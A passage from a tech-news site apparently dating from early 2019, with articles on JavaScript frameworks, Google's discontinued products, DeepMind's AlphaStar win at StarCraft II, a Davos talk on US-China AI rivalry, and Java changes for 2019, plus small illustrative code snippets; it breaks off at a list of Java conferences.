React was first developed by Facebook in 2011 and then open sourced in 2013. Since then it has become one of the most popular JavaScript libraries for building user interfaces. According to npm’s survey, despite a slowdown in React’s growth in 2018, it will be the dominant framework in 2019. The State of JavaScript 2018 survey designates it as “a safe technology to adopt” given its high usage satisfaction ratio and a large user base. In 2018, the React team released versions from 16.3 to 16.7 with some major updates. These updates included new lifecycle methods, the Context API, suspense for code splitting, a React Profiler, Create React App 2.0, and more. The team has already laid out its plan for 2019 and will soon be releasing one of the most awaited features, Hooks, which allows developers to access features such as state without using JavaScript classes. It aims to simplify the code for React components by allowing developers to reuse stateful logic without making any changes to the component hierarchy. Other features will include a concurrent mode to allow component tree rendering without blocking the main thread, suspense for data fetching, and more.
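Hooks hadn't shipped at the time of writing, but the core idea - state that persists across calls to a plain function, without classes - can be sketched in a few lines of plain JavaScript. This is only a toy illustration of the concept, not React's API or implementation:

```javascript
// Toy sketch of the idea behind Hooks: component state that persists
// across calls to a plain function. NOT React's implementation.
const hookStates = [];
let hookIndex = 0;

function useState(initialValue) {
  const i = hookIndex++;
  if (hookStates[i] === undefined) hookStates[i] = initialValue;
  const setState = (value) => { hookStates[i] = value; };
  return [hookStates[i], setState];
}

// A "component" is just a function; a real renderer would reset
// hookIndex before each render, which we do manually here.
function Counter() {
  hookIndex = 0;
  const [count, setCount] = useState(0);
  return { text: `Count: ${count}`, increment: () => setCount(count + 1) };
}
```

Calling Counter() twice with an increment in between shows the state surviving between "renders" even though no class instance is involved.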
Vue

Vue was created by Evan You after working for Google using AngularJS in a number of projects. It was first released in 2014. Sharing his motivation for creating Vue, Evan said, "I figured, what if I could just extract the part that I really liked about Angular and build something really lightweight." Vue has continued to show great adoption among JavaScript developers and I doubt this trend is going to stop anytime soon. According to the npm survey, some developers prefer Vue over React because they feel that it is “easier to get started with, while maintaining extensibility.” Vue is a library that allows developers to build interactive web interfaces. It provides data-reactive components, similar to React, with a simple and flexible API. Unlike React or Angular, one of the benefits of Vue is the clean HTML output it produces. Other JavaScript libraries tend to leave the HTML scattered with extra attributes and classes in the code, whereas Vue removes these to produce clean, semantic output. It provides advanced features such as routing, state management, and build tooling for complex applications via officially maintained supporting libraries and packages.

Angular

Google developed AngularJS in 2009 and released its first version in 2012. Since then it has seen enthusiastic support and widespread adoption among both enterprises and individuals. AngularJS was originally developed for designers, not developers. While it did see a few evolutionary improvements in its design, they were not enough to fulfill developer requirements. The later versions, Angular 2, Angular 4, and so on, have been upgraded to provide an overall improvement in performance, especially in speed and dependency injection. The new version is simply called Angular, a platform and framework that allows developers to build client applications in HTML and TypeScript.
It comes with declarative templates, dependency injection, end-to-end tooling, and integrated best practices to solve development challenges. While the architecture of AngularJS is based on the model-view-controller (MVC) design, Angular has a component-based architecture. Every Angular application consists of at least one component known as the root component. Each component is associated with a class that’s responsible for handling the business logic and a template that represents the view layer.

Node.js

There has been a lot of debate around whether Node is a framework (it’s really a runtime environment), but when talking about web development it is very hard to skip it. Node.js was originally written by Ryan Dahl, who demonstrated it at the inaugural European JSConf on November 8, 2009. Node.js is a free, open-source, cross-platform JavaScript run-time environment that executes JavaScript code outside of a browser. Node.js follows a "JavaScript everywhere" paradigm by unifying web application development around a single programming language, rather than different languages for server side and client side scripts. At JSConf 2018, Dahl described some limitations of his server-side JavaScript runtime engine. Many parts of its architecture suffer from limitations, including security and how modules are managed. As a solution to this he introduced a new software project called Deno, a secure TypeScript runtime on the V8 JavaScript engine that sets out to correct some of the design flaws in Node.js.

Cross-platform mobile development frameworks

React Native

The story of React Native started in the summer of 2013 as Facebook’s internal hackathon project and it was later open sourced in 2015. React Native is a JavaScript framework used to build native mobile applications. As you might have already guessed from its name, React Native is based on React, which we discussed earlier.
The reason why it is called “native” is that the UI built with React Native consists of native UI widgets that look and feel consistent with the apps you built using native languages. Under the hood, React Native translates your UI definition written in JavaScript/JSX into a hierarchy of native views correct for the target platform. For example, if we are building an iOS app, it will translate the Text primitive to a native iOS UIView, and in Android, it will result in a native TextView. So, even though we are writing a JavaScript application, we do not get a web app embedded inside the shell of a mobile one. We are getting a “real native app”.

NativeScript

NativeScript was developed by Telerik (a subsidiary of Progress) and first released in 2014. It’s an open source framework that helps you build apps using JavaScript or any other language that transpiles to JavaScript, for example, TypeScript. It directly supports the Angular framework and supports the Vue framework via a community-developed plugin. Mobile applications built with NativeScript result in fully native apps, which use the same APIs as if they were developed in Xcode or Android Studio. Since the applications are built in JavaScript there is a need for some proxy mechanism to translate JavaScript code to the corresponding native APIs. This is done by the runtime parts of NativeScript, which act as a “bridge” between the JavaScript and the native world (Android and iOS). The runtimes facilitate calling APIs in the Android and iOS frameworks using JavaScript code. To do that, JavaScript virtual machines are used – Google’s V8 for Android and WebKit’s JavaScriptCore implementation distributed with iOS 7.0+.

Ionic Framework

The Ionic framework was created by Drifty Co. and initially released in 2013. It is an open source, frontend SDK for developing hybrid mobile apps with familiar web technologies such as HTML5, CSS, and JavaScript.
With Ionic, you will be able to build and deploy apps that work across multiple platforms, such as native iOS, Android, desktop, and the web as a Progressive Web App. Ionic is mainly focused on an application’s look and feel, or the UI interaction. This tells us that it’s not meant to replace Cordova or your favorite JavaScript framework. In fact, it still needs a native wrapper like Cordova to run your app as a mobile app. It uses these wrappers to gain access to host operating system features such as the camera, GPS, flashlight, etc. Ionic apps run in a low-level browser shell like UIWebView in iOS or WebView in Android, which is wrapped by tools like Cordova/PhoneGap.

JavaScript Desktop application development frameworks

Electron

Electron was created by Cheng Zhao, a software engineer at GitHub. It was initially released in 2013 as Atom Shell and then renamed to Electron in 2015. Electron enables web developers to use their existing knowledge and native developers to build one codebase and ship it for each platform separately. There are many popular apps that are built with Electron, including Slack, Skype for Linux, Simplenote, and Visual Studio Code, among others. An Electron app consists of three components: the Chromium web engine, a Node.js interpreter, and your application’s source code. The Chromium web engine is responsible for rendering the UI. The Node.js interpreter executes JavaScript and provides your app access to OS features that are not available to the Chromium engine, such as filesystem access, networking, native desktop functions, etc. The application’s source code is usually a combination of JavaScript, HTML, and CSS.

JavaScript Machine learning frameworks

TensorFlow.js

At the TensorFlow Dev Summit 2018, Google announced the JavaScript implementation of TensorFlow, their machine learning framework, called TensorFlow.js. It is the successor of deeplearn.js, which was released in August 2017, and is now named TensorFlow.js Core.
The team recently released Node.js bindings for TensorFlow, so now the same JavaScript code will work on both the browser and Node.js. TensorFlow.js consists of four layers, namely the WebGL API for GPU-supported numerical operations, the web browser for user interactions, and two APIs: Core and Layers. The low-level Core API corresponds to the former deeplearn.js library, which provides hardware-accelerated linear algebra operations and an eager API for automatic differentiation. The higher-level Layers API is used to build machine-learning models on top of Core. It also allows developers to import models previously trained in Python with Keras or TensorFlow SavedModels and use them for inference or transfer learning in the browser.

Brain.js

Brain.js is a neural network library written in JavaScript and a continuation of the “brain” library, which can be used with Node.js or in the browser. It simplifies the process of creating and training a neural network by utilizing the ease-of-use of JavaScript and by limiting the API to just a few method calls and options. It comes with different types of networks for different tasks, which include a feedforward neural network with backpropagation, a time step recurrent neural network, and a time step long short-term memory neural network, among others.

JavaScript augmented reality and virtual reality frameworks

React 360

In 2017, Facebook and Oculus together introduced React VR, which was revamped and rebranded last year as React 360. This improved version simplifies UI layout in 3D space and is faster than React VR. Built on top of React, which we discussed earlier, React 360 is a JavaScript library that enables developers to create 3D and VR interfaces. It allows web developers to use familiar tools and concepts to create immersive 360 experiences on the web. An application built with React 360 consists of two pieces, namely, your React application and the runtime, which turns your components into 3D elements on the screen.
This “division of roles” concept is similar to React Native. As web browsers are single-threaded, the app code is separated from the rendering code to avoid any blocking behavior in the app. By running the app code in a separate context, the rendering loop is allowed to consistently update at a high frame rate.

AR.js

AR.js was developed by Jerome Etienne in 2017 with the aim of implementing augmented reality efficiently on the web. It currently achieves 60fps, which is not bad for an open source web-based solution. The library was inspired by projects like three.js, ARToolKit 5, emscripten and Chromium. AR.js requires WebGL, a 3D graphics API for the HTML5 Canvas element, and WebRTC, a set of browser APIs and protocols that allow for real-time communications of audio, video, and data in web browsers and native apps. Leveraging features in ARToolKit and A-Frame, AR.js makes the development of AR for the web a straightforward process that can be implemented by novice coders.

New and emerging JavaScript frameworks

Gatsby.js

The creator of Gatsby, Kyle Mathews, quit his startup job in 2017 and started focusing full-time on his side projects: Gatsby.js and Typography.js. Gatsby.js was initially released in 2015 and its 1.0 version came out in 2017. It is a modern site generator for React.js, which means everything in Gatsby is built using components. With Gatsby, you can create both dynamic and static websites/web apps ranging from simple blogs and e-commerce websites to user dashboards. Gatsby supports many data sources such as Markdown files, a headless CMS like Contentful or WordPress, or a REST or GraphQL API, which you can consolidate via GraphQL. It also makes things like code splitting, image optimization, inlining critical styles, lazy-loading, and prefetching resources easier by automating them.

Next.js

Next.js was created by ZEIT and open sourced in 2016.
Built on top of React, Webpack, and Babel, Next.js is a small JavaScript framework that enables easy server-side rendering of React applications. It provides features like automatic code splitting, simple client-side routing, a Webpack-based dev environment which supports HMR, and more. It aims to help developers write an isomorphic React application, so that the same rendering logic can be used for both client-side and server-side rendering. Next.js basically allows you to write a React app, with the SSR and things like code splitting being taken care of for you. It supports two server-side rendering modes: on demand and static export. On demand rendering means that for each request, a unique page is rendered. This property is great for web apps that are highly dynamic, in which content changes often, that have a login state, and similar use cases. This mode requires having a Node.js server running. Static export, on the other hand, renders all pages to .html files up-front and serves them using any file server. This mode does not require a Node.js server running and the HTML can run anywhere.

Nuxt.js

Nuxt.js was originally created by the Chopin brothers, Alexandre and Sébastien Chopin, and released in 2016. In January 2018, it was updated to a production-ready 1.0 version and is backed by an active and well-supported community. It is a higher-level framework inspired by Next.js, which builds on top of the Vue.js ecosystem and simplifies the development of universal or single page Vue.js applications. Under the hood, Nuxt.js uses webpack with vue-loader and babel-loader to bundle, code-split and minify your code. One of the perks of using Nuxt.js is that it provides a nuxt generate command, which generates a completely static version of your Vue application using the same codebase. In addition to that, it provides features for development shared between the client side and the server side, such as Asynchronous Data, Middleware, Layouts, etc.
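The isomorphic idea behind both Next.js and Nuxt.js can be boiled down to a toy sketch: the same component function that would render in the browser produces an HTML string on the server. This is illustrative only - the real frameworks add hydration, routing, code splitting, and much more:

```javascript
// A component is just a function from props to markup. On the server it
// renders to a string; in the browser the same function would drive the DOM.
const App = (props) => `<h1>Hello, ${props.name}!</h1>`;

// "Server side": wrap the component's output in a full HTML document.
function renderToHtml(component, props) {
  return `<!doctype html><html><body>${component(props)}</body></html>`;
}

const html = renderToHtml(App, { name: 'reader' });
```

Because the same App function can run in both environments, the server can send ready-made HTML and the client can take over rendering from there - the essence of SSR frameworks.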
NestJS

NestJS was created by Kamil Mysliwiec and released in 2017. It is a framework for effortlessly building efficient, reliable, and scalable Node.js server-side applications. It builds on top of TypeScript and JavaScript (ES6, ES7, ES8) and is heavily inspired by Angular, as both use a module/component system that allows for reusability. Under the hood, NestJS uses Express, and is also compatible with a wide range of other libraries, for example, Fastify. For most of its abstractions, it uses classes and leverages the benefits of decorators and metadata reflection that classes and TypeScript bring. It comes with concepts like guards, pipes, and interceptors, and built-in support for other transports like WebSockets and gRPC. These were some of my picks from the plethora of JavaScript frameworks. You surely don't have to be an expert in all of them. Play with them, read the documentation, get an overview of their features. Before you start using a framework, you can check a few things, such as the problems it solves, whether any other frameworks do the same things better, whether it aligns with your project requirements, which types of projects the framework would be ideal for, and so on. If a framework appeals to you, maybe try to build a project with it.

npm JavaScript predictions for 2019: React, GraphQL, and TypeScript are three technologies to learn
4 key findings from The State of JavaScript 2018 developer survey
JavaScript mobile frameworks comparison: React Native vs Ionic vs NativeScript

Why Google kills its own products

Sugandha Lahoti
25 Jan 2019
6 min read
The internet is abuzz with discussions of popular (and sometimes short-lived) Google products that the company has killed. The conversation has recently been kickstarted by Killed by Google and Google Cemetery, which provided an ‘obituary’ of dead Google products and services last week. Google has always been enthusiastic about venturing into new fields. That’s one of the crucial reasons for its success. Taking risks on new products is inevitably going to produce a share of martyrs, but it’s the price you pay to establish new products. Most importantly, none of these ‘dead’ products have vanished completely. There is always a strong alternative that Google is investing in. Many of these dead products are actually an important step towards something better and more successful. Those that do die have either reached EOL (if hardware based), are rebranded/merged with an existing product, or are split into a separate Alphabet company.

But why does Google kill products?

Dead products are really just a by-product of innovation. For Google to move quickly as a business - to compete with the likes of Amazon - it needs to try new things, and, by the same token, stop things when they’re not working out. While no one likes to fail, in Silicon Valley failing fast has become a well-known philosophy. Dead products that once seemed cutting-edge lay the groundwork for better, more well-timed ideas that flourish later. Failure can lead to success - maybe even something world-changing. Like an experiment gone awry, they teach companies more about technology and how people want to use it.

Google likes to ignore the market and see what surprises users

Google’s strategy has always been to pay less attention to market research. By doing market research, a company tries to design and launch a product that fits with people’s expectations - in general, a good idea, especially if you can’t afford to invest in something that’s a risk.
Google, on the other hand, with the astonishing amount of capital at its disposal, can almost skip this altogether. If they have a bright, smart idea, they just put it in the market for people to test and see. This was done with Google Tez, a mobile payments service by Google that was targeted at users in India. Since launching the app, over 55 million people have downloaded it, and more than 22 million people and businesses actively use the app for digital transactions every month. This success was a signal to Google that the app might do even better if it were given a universally-recognized name. Tez was killed almost 3 months ago and rebranded to Google Pay. Google now has a unified global payments service built on what it had created for India.

Deceased Google products with a second life under a new brand name

Here are a few more examples of what Google has demolished and subsequently rebranded:

On September 16, 2014, it was announced that Google intended to close Panoramio and migrate it to Google Maps Views.
Google News & Weather is a news aggregator application developed by Google. On May 8, 2018, Google announced that it was merging Google Play Newsstand and Google News & Weather into a single service, called Google News.
Google Allo is an instant messaging mobile app by Google. It will be rebranded as Google Chat. It was killed 7 months ago.
Project Tango was an API for augmented reality apps that was killed and replaced by ARCore.

Sometimes, poor products are the problem

While some Google products simply needed better branding, there are plenty of examples of projects that were terminated simply because they weren’t good enough. This is often down to engineering mistakes (bugs) or a lack of user engagement. Google stated that the primary reason for retiring Picasa was that it wanted to focus its efforts “entirely on a single photos service”, the cross-platform, web-based Google Photos.
Over the past decade, the growth of Facebook, YouTube, Blogger, and Google+ has outpaced Orkut’s. Google decided to bid Orkut farewell and shut it down. On April 20, 2015, Google officially shut down Helpouts, stating that the service hadn’t “grown at the pace we had expected.” Most recently, in October 2018, Google announced that it was shutting down Google+ for consumers, citing low user engagement and a software error. Surprisingly, lists such as these have had the exact opposite effect to what was intended by their creators. People support Google for rebranding its projects. A Hacker News user said, “This list actually had the opposite intended effect on me. Yeah, Google Reader should have stuck around. But half of these I've either never heard of or only faintly remember. And the ones I do remember seem like reasonable axes. Google Video, for example, seemed to serve the sole purpose of making me think "dammit, why doesn't the 'Video' tab just take me to YouTube?" So Google's huge and had to cut off some redundant services over the years. So what. In view of privacy violations, military tech collaborations, and so on, EOL-ing a couple dozen services is hardly a cardinal sin.” However, the downside of retiring products is that there will always be someone who is unhappy. Even if a product isn’t widely used, there will always be some people that like the product, maybe have even grown to love it. Like a breakfast radio show, people form habits around a product’s UI and overall experience. They become comfortable. Some people have argued that Google has killed stuff on a whim. Google Reader, the URL shortener, Code Search, and Picasa were all cited as examples of things that the company should not have shut down. Here are some of the reactions of people on Hacker News.
“Other day I was looking to buy a movie and it was available on Amazon as well as YouTube, I went to Amazon because YouTube feels much more likely to shut down it’s movie business on a whim while Amazon will likely fight out to last moment. Same goes for buying music.”

“Even after 5+ years, I still miss Google Reader almost every day. Just pure simplicity and tight community around sharing are yet to be matched in my opinion. The web has moved on and as someone commented here, it’s walled garden everywhere now.”

Read more of this conversation on Hacker News.

Dead products can teach us a lot about the priorities of businesses, and maybe even something about the people that use them - people like us. Ultimately, however, dead products are the waste product of a philosophy of growth: as a business looks to expand into new markets, some products are probably going to get the chop.

Read Next

Google hints shutting down Google News over EU’s implementation of Article 11 or the “link tax”
Google releases Magenta studio beta, an open source python machine learning library for music artists
Day 1 of Chrome Dev Summit 2018: new announcements and Google’s initiative to close the gap between web and native

Google DeepMind’s AI AlphaStar beats StarCraft II pros TLO and MaNa; wins 10-1 against the gamers

Natasha Mathur
25 Jan 2019
5 min read
Two days ago, the Blizzard team announced an update about the progress made by Google’s DeepMind AI at StarCraft II, a real-time strategy video game. The demo was presented yesterday over a live stream, where AlphaStar, DeepMind’s StarCraft II AI program, beat the top two professional StarCraft II players, TLO and MaNa. The demo presented a series of five separate test matches held earlier, on 19 December, against Team Liquid’s Grzegorz "MaNa" Komincz and Dario “TLO” Wünsch. AlphaStar beat the two professional players, scoring 10-0 in total (5-0 against each). After the 10 straight wins, AlphaStar was finally beaten by MaNa in a live match streamed by Blizzard and DeepMind.

https://twitter.com/LiquidTLO/status/1088524496246657030
https://twitter.com/Liquid_MaNa/status/1088534975044087808

How does AlphaStar learn?

AlphaStar learns by imitating the basic micro and macro-strategies used by players on the StarCraft ladder. A neural network was initially trained using supervised learning on anonymised human games released by Blizzard. This initial agent managed to defeat the “Elite” level AI in 95% of games. Once the agents are trained from human game replays, they are then trained against other competitors in the “AlphaStar league”. This is where a multi-agent reinforcement learning process starts. New competitors are added to the league, branched from existing competitors. Each of these agents then learns from games against other competitors. This ensures that each competitor performs well against the strongest strategies, and does not forget how to defeat earlier ones. As the league progresses, new counter-strategies emerge that can defeat the earlier strategies. Also, each agent has its own learning objective, which gets adapted during training.
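To make the league idea above concrete, here is a deliberately tiny, hypothetical sketch (plain Java, nothing like DeepMind's actual code): agents are just rock-paper-scissors-style strategies, each generation plays a round-robin, and a new competitor is branched to counter the current best.

```java
import java.util.ArrayList;
import java.util.List;

// Toy "league" self-play loop: each agent is a strategy 0, 1 or 2,
// where strategy s is beaten by (s + 1) % 3, as in rock-paper-scissors.
public class ToyLeague {
    // Returns 1 if a beats b, -1 if b beats a, 0 for a draw.
    static int play(int a, int b) {
        if (a == b) return 0;
        return (a - b + 3) % 3 == 1 ? 1 : -1;
    }

    // Each generation, every agent plays everyone in the league; the best
    // performer is then "branched": a new agent joins whose objective is
    // simply to beat the current champion. Old agents stay in the league,
    // so later agents cannot forget how to handle earlier strategies.
    static List<Integer> train(int generations) {
        List<Integer> league = new ArrayList<>(List.of(0)); // seed agent
        for (int g = 0; g < generations; g++) {
            int best = 0, bestScore = Integer.MIN_VALUE;
            for (int i = 0; i < league.size(); i++) {
                int score = 0;
                for (int j = 0; j < league.size(); j++) {
                    score += play(league.get(i), league.get(j));
                }
                if (score > bestScore) { bestScore = score; best = i; }
            }
            league.add((league.get(best) + 1) % 3); // branch a counter-agent
        }
        return league;
    }

    public static void main(String[] args) {
        // The league keeps growing, cycling through counter-strategies.
        System.out.println(ToyLeague.train(4));
    }
}
```

The real system replaces the integers with neural networks and the round-robin scoring with reinforcement-learning updates, but the shape of the loop - play the league, branch new competitors, keep old ones around so nothing is forgotten - is the same.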
One agent might have an objective to beat one specific competitor, while another might want to beat a whole distribution of competitors. The neural network weights of each agent are updated using reinforcement learning from its games against competitors, optimising its personal learning objective.

How does AlphaStar play the game?

TLO and MaNa, professional StarCraft players, can issue hundreds of actions per minute (APM) on average. AlphaStar had an average APM of around 280 in its games against TLO and MaNa, significantly lower than the professional players. This is because AlphaStar starts its learning from replays and thereby mimics the way humans play the game. AlphaStar also showed an average delay between observation and action of 350ms.

AlphaStar might have had a slight advantage over the human players, as it interacted with the StarCraft game engine directly via its raw interface. What this means is that it could directly observe the attributes of its own and its opponent’s visible units on the map, essentially getting a zoomed-out view of the game. Human players, however, have to split their time and attention to decide where to focus the camera on the map. But the analysis of the games showed that the AI agents “switched context” about 30 times per minute, akin to MaNa or TLO. This suggests that AlphaStar’s success against MaNa and TLO is due to its superior macro and micro-strategic decision-making, rather than a superior click-rate, faster reaction times, or the raw interface.

MaNa managed to beat AlphaStar in one match

DeepMind also developed a second version of AlphaStar, which played like human players, meaning that it had to choose when and where to move the camera. Two new agents, one that used the raw interface and one that learned to control the camera, were trained against the AlphaStar league.
“The version of AlphaStar using the camera interface was almost as strong as the raw interface, exceeding 7000 MMR on our internal leaderboard”, states the DeepMind team. But the team didn’t get the chance to test the AI against a human pro prior to the live stream. In a live exhibition match, MaNa managed to defeat the new version of AlphaStar using the camera interface, which had been trained for only 7 days. “We hope to evaluate a fully trained instance of the camera interface in the near future”, says the team.

The DeepMind team states that AlphaStar’s performance was initially tested against TLO, where it won the match. “I was surprised by how strong the agent was... (it) takes well-known strategies... I hadn’t thought of before, which means there may still be new ways of playing the game that we haven’t fully explored yet,” said TLO. The agents were then trained for an extra week, after which they played against MaNa. AlphaStar again won the game. “I was impressed to see AlphaStar pull off advanced moves and different strategies across almost every game, using a very human style of gameplay I wouldn’t have expected... this has put the game in a whole new light for me. We’re all excited to see what comes next,” said MaNa.

Public reaction to the news is very positive, with people congratulating the DeepMind team for AlphaStar’s win:

https://twitter.com/SebastienBubeck/status/1088524371285557248
https://twitter.com/KaiLashArul/status/1088534443718045696
https://twitter.com/fhuszar/status/1088534423786668042
https://twitter.com/panicsw1tched/status/1088524675540549635
https://twitter.com/Denver_sc2/status/1088525423229759489

To learn about the strategies developed by AlphaStar, check out the complete set of replays of AlphaStar's matches against TLO and MaNa on DeepMind's website.
Read Next

Best game engines for Artificial Intelligence game development
Deepmind’s AlphaZero shows unprecedented growth in AI, masters 3 different games
Deepmind’s AlphaFold is successful in predicting the 3D structure of a protein making major inroads for AI use in healthcare
What the US-China tech and AI arms race means for the world - Frederick Kempe at Davos 2019

Sugandha Lahoti
24 Jan 2019
6 min read
Atlantic Council CEO Frederick Kempe spoke at the World Economic Forum (WEF) in Davos, Switzerland. In his presentation, Future Frontiers of Technology Control, he talked about the cold war between the US and China and why the two countries need to cooperate rather than compete in the tech arms race. He began by posing a question set forth by former US National Security Advisor Stephen Hadley: “Can the incumbent US and insurgent China become strategic collaborators and strategic competitors in this tech space at the same time?”

Read also: The New AI Cold War Between China and the USA

Kempe’s three framing arguments

Geopolitical Competition

The fusion of tech breakthroughs blurring the lines between the physical, digital, and biological spheres is reaching an inflection point, and it is already clear that these breakthroughs will usher in a revolution that will determine the shape of the global economy. They will also determine which nations and political constructs may assume the commanding heights of global politics in the coming decade.

Technological superiority

Over the course of history, societies that dominated economic innovation and progress have dominated in international relations - from military superiority to societal progress and prosperity. On balance, technological progress has contributed to higher standards of living in most parts of the world; however, the disproportionate benefit goes to first movers.

Commanding Heights

The technological arms race for supremacy in the fourth industrial revolution has essentially become a two-horse contest between the United States and China. We are in the early stages of this race, but how it unfolds and is conducted will do much to shape global human relations. The shift in 2018 in US-China relations, from a period of strategic engagement to greater strategic competition, has also significantly accelerated the tech arms race.

China vs the US: Why does China have the edge?
It was Vladimir Putin, President of the Russian Federation, who said that “the one who becomes the leader in artificial intelligence will rule the world.” In 2017, DeepMind’s AlphaGo defeated a Chinese master in Go, a traditional Chinese game. Following this defeat, China launched an ambitious roadmap, called the Next Generation AI Plan, with the goal of becoming the global leader in AI by 2030 in theory, technology, and application. On current trajectories, in the four primary areas of AI over the next 5 years, China will emerge the winner of this new technology race.

Kempe also quotes Kai-Fu Lee, author of the book AI Superpowers, who argues that harnessing the power of AI today - the electricity of the 21st century - requires abundant data, hungry entrepreneurs, AI scientists, and an AI-friendly policy. He believes that China has the edge in all of these. AI has moved from out-of-the-box research, where the US has the expertise, to actual implementation, where China has the edge. Per Kai-Fu Lee, China already has the edge in entrepreneurship, data, and government support, and is rapidly catching up to the U.S. in expertise. The world has moved from the age of world-leading expertise, where the US dominates, to the age of data, where China wins hands down. Economists call China the Saudi Arabia of data, and with that as the fuel for AI, it has an enormous advantage. The Chinese government, without privacy restrictions, can gain and use data in a manner that is out of reach of any democracy. Kempe concludes that the nature of this technological arms contest may favor insurgent China rather than the incumbent US.

What are the societal implications of this tech cold war?

Kempe also touched upon the societal implications of AI and the cold war between the US and China. A large number of jobs will be lost by 2030.
Quoting from Kai-Fu Lee’s book, Kempe says that artificial intelligence and advanced robotics could displace up to 54 million US workers, who comprise 30% of the US labor force, and up to 100 million Chinese workers, 12% of the Chinese labor force. What is the way forward, given these huge societal implications of the bilateral race underway? Kempe sees three possibilities.

A sloppy Status Quo

A status quo in which China and the US continue to cooperate but increasingly view each other with suspicion. They manage their rising differences and distrust imperfectly, never bridging them entirely, but also not burning bridges, whether between researchers, corporations, or others.

Techno Cold War

China and the US turn the global tech contest into more of a zero-sum battle for global domination. They organize themselves in a manner that separates their tech sectors from each other and ultimately divides up the world.

Collaborative Future - the one we hope for

Nicholas Thompson and Ian Bremmer argued in a Wired interview that despite the two countries’ societal differences, the US should wrap China in a tech embrace. The two countries should work together to establish international standards to ensure that the algorithms governing people’s lives and livelihoods are transparent and accountable. They should recognize that while the geopolitics of technological change is significant, even more important will be the challenges AI poses to all societies across the world in terms of job automation and the social disruptions that may come with it. It may sound utopian to expect the US and China to cooperate in this manner, but this is what we should hope for. To do otherwise would be self-defeating, at the cost of others in the global community, which needs our best thinking to navigate the challenges of the fourth industrial revolution.
Kempe concludes his presentation with a quote by Henry Kissinger, former US Secretary of State and National Security Advisor: “We’re in a position in which the peace and prosperity of the world depend on whether China and the US can find a method to work together, not always in agreement, but to handle our disagreements... This is the key problem of our time.”

Note: All images in this article are taken from Frederick Kempe’s presentation.

Read Next

We must change how we think about AI, urge AI founding fathers
Does AI deserve to be so Overhyped?
Alarming ways governments are using surveillance tech to watch you

7 things Java programmers need to watch for in 2019

Prasad Ramesh
24 Jan 2019
7 min read
Java is one of the most popular and widely used programming languages in the world. Its dominance of the TIOBE index ranking is unmatched for the most part, holding the number 1 position for almost 20 years. Although Java’s dominance is unlikely to waver over the next 12 months, there are many important issues and announcements that will demand the attention of Java developers. So, get ready for 2019 with this list of key things in the Java world to watch out for.

#1 Commercial Java SE users will now need a license

Perhaps the most important change for Java in 2019 is that commercial users will have to pay a license fee to use Java SE from February. This move comes as Oracle has decided to change the support model for the Java language. The change currently affects Java SE 8, an LTS release with premier and extended support up to March 2022 and March 2025 respectively. For individual users, however, support and updates will continue until December 2020. The recently released Java SE 11 will also have long-term support, with five years of premier support and eight years of extended support from the release date.

#2 The Java 12 release in March 2019

Since Oracle changed its support model, non-LTS versions will be released every six months and probably won’t contain many major changes. JDK 12 is non-LTS; that is not to say that the changes in it are trivial, as it comes with its own set of new features. It will be generally available in March this year and supported until September, which is when Java 13 will be released. Java 12 will have a couple of new features, some of them approved to ship in its March release and some still under discussion.

#3 Java 13 release slated for September 2019, with early access out now

So far, there is very little information about Java 13. All we really know at the moment is that it’s due to be released in September 2019. Like Java 12, Java 13 will be a non-LTS release.
However, if you want an early insight, there is an early access build available to test right now. Some of the JEPs (JDK Enhancement Proposals) in the next section may be set to be featured in Java 13, but that’s just speculation.

https://twitter.com/OpenJDK/status/1082200155854639104

#4 A bunch of new features in Java in 2019

Even though the major long-term support version of Java, Java 11, was released last year, the releases this year also have some noteworthy features in store. Let’s take a look at what the two releases this year might have.

Confirmed candidates for Java 12

A new low-pause-time garbage collector called Shenandoah, added to cause minimal interruption when a program is running. Pause times will be the same irrespective of heap size, which is achieved by performing evacuation work concurrently with the running Java threads.
The Microbenchmark Suite, which will make it easier for developers to run existing microbenchmarks or create new ones.
Revamped switch statements, which should help simplify the process of writing code. It essentially means the switch statement can also be used as an expression.
The JVM Constants API, which will, the OpenJDK website explains, “introduce a new API to model nominal descriptions of key class-file and run-time artifacts”.
One AArch64 port, instead of two.
Default CDS archives.
Abortable mixed collections for G1.

Other features that may not be out with Java 12

Raw string literals.
A packaging tool, designed to make it easier to install and run a self-contained Java application on a native platform.
Limit Speculative Execution, to help both developers and operations engineers more effectively secure applications against speculative-execution vulnerabilities.

#5 More contributions and features with OpenJDK

OpenJDK is an open source implementation of Java Standard Edition (Java SE) which has contributions from both Oracle and the open-source community.
As of now, the binaries of OpenJDK are available for the newest LTS release, Java 11. The life cycles of OpenJDK 7 and 8 have even been extended, to June 2020 and June 2023 respectively. This suggests that Oracle does seem to be interested in the idea of open source and community participation. And why would it not be? Many valuable contributions come from the open source community; Microsoft, too, seems to have benefited from the submissions that open sourcing brings in. Although Oracle will not support these versions after six months from initial release, Red Hat will be extending support. As the chief architect of the Java platform, Mark Reinhold, said, stewards are the true leaders who can shape what Java should be as a language. These stewards can propose new JEPs, bring new OpenJDK problems to notice (leading to more JEPs), and contribute to the language overall.

#6 Mobile and machine learning job opportunities

In the mobile ecosystem, especially Android, Java is still the most widely used language. Yes, there’s Kotlin, but it is still relatively new, and many developers are yet to adopt it. According to an estimate by Indeed, the average salary of a Java developer is about $100K in the U.S. With the Android ecosystem growing rapidly over the last decade, it’s not hard to see what’s driving Java’s value. But Java - and the broader Java ecosystem - are about much more than mobile. Although Java’s importance in enterprise application development is well known, it’s also used in machine learning and artificial intelligence. Even if Python is arguably the most used language in this area, Java does have its own set of libraries and is used a lot in enterprise environments. Deeplearning4j, Neuroph, Weka, OpenNLP, RapidMiner, and RL4J are some of the popular Java libraries in artificial intelligence.
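Of the Java 12 features mentioned earlier, the revamped switch is the easiest to picture. Here is a rough sketch of the expression form (a preview feature in JDK 12, standardized in later releases, so the exact syntax may differ; the day-to-letter-count mapping is just an illustrative example):

```java
// Using switch as an expression: each arm yields a value, there is no
// fall-through, and multiple labels can share one arm.
public class DaySwitch {
    static int letters(String day) {
        return switch (day) {
            case "MONDAY", "FRIDAY", "SUNDAY" -> 6;
            case "TUESDAY" -> 7;
            case "THURSDAY", "SATURDAY" -> 8;
            case "WEDNESDAY" -> 9;
            default -> day.length();
        };
    }

    public static void main(String[] args) {
        System.out.println("TUESDAY has " + letters("TUESDAY") + " letters");
    }
}
```

Note that compiling this on JDK 12 itself requires the --enable-preview flag, since switch expressions shipped there as a preview feature.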
#7 Java conferences in 2019

Now that we’ve talked about the language, possible releases, and new features, let’s take a look at the conferences taking place in 2019. Conferences are a good place to hear top professionals present and speak, and for programmers to socialize. Even if you can’t attend, they are important fixtures in the calendar for anyone interested in following releases and debates in Java. Here are some of the major Java conferences in 2019 worth checking out:

